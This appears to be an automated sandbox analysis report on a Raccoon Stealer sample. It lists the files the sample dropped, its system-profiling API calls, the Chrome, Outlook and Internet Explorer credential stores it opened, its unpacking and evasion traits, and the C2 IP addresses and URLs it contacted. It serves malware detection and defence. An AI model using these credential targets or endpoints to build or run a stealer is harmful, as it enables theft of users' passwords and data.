Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043DA90
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045E752 FindFirstFileExW, 1_2_0045E752
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 1_2_00434721
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: KqxsoH2Rhn.exe, 00000001.00000003.370416716.000000004DC8D000.00000004.00000010.sdmp Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&
Source: KqxsoH2Rhn.exe, 00000001.00000003.376906908.000000004DC8D000.00000004.00000010.sdmp Binary or memory string: Prod_VMware_SATA_CD00#5&280b647&0&00y

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 1_2_004333DD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 1_2_004322AF

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 1_2_00429B40
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0045084A
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 1_2_00435C73
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_00427AAA
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 1_2_004362A1

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 1_2_0043434E
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 518394 Sample: KqxsoH2Rhn.exe Startdate: 09/11/2021 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected Raccoon Stealer 2->36 38 2 other signatures 2->38 7 KqxsoH2Rhn.exe 83 2->7         started        process3 dnsIp4 26 91.219.236.162, 80 SERVERASTRA-ASHU Hungary 7->26 28 185.163.47.176, 49743, 80 MIVOCLOUDMD Moldova Republic of 7->28 30 2 other IPs or domains 7->30 18 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\vcruntime140.dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\ucrtbase.dll, PE32 7->22 dropped 24 56 other files (none is malicious) 7->24 dropped 40 Detected unpacking (changes PE section rights) 7->40 42 Detected unpacking (overwrites its own PE header) 7->42 44 Tries to steal Mail credentials (via file / registry access) 7->44 46 3 other signatures 7->46 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 conhost.exe 12->14         started        16 timeout.exe 1 12->16         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.219.236.162
 unknown Hungary
56322 SERVERASTRA-ASHU true
185.163.47.176
 unknown Moldova Republic of
39798 MIVOCLOUDMD true
178.23.190.57
 unknown unknown
196724 LYNERO-ASDK true
194.180.174.182
 unknown unknown
39798 MIVOCLOUDMD true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://74.119.192.122/rino115sipsip true
  • Avira URL Cloud: safe
 unknown
http://194.180.174.182/ true
  • Avira URL Cloud: safe
 unknown
http://185.163.47.176/rino115sipsip true
  • Avira URL Cloud: safe
 unknown
http://193.38.54.238/rino115sipsip true
  • Avira URL Cloud: safe
 unknown
http://194.180.174.182//l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c true
  • Avira URL Cloud: safe
 unknown
http://178.23.190.57/rino115sipsip true
  • Avira URL Cloud: safe
 unknown
http://91.219.236.162/rino115sipsip true
  • Avira URL Cloud: safe
 unknown
https://t.me/rino115sipsip false
    		high
    http://91.219.236.240/rino115sipsip true
    • Avira URL Cloud: safe
    		 unknown
    http://194.180.174.182//l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed true
    • Avira URL Cloud: safe
    		 unknown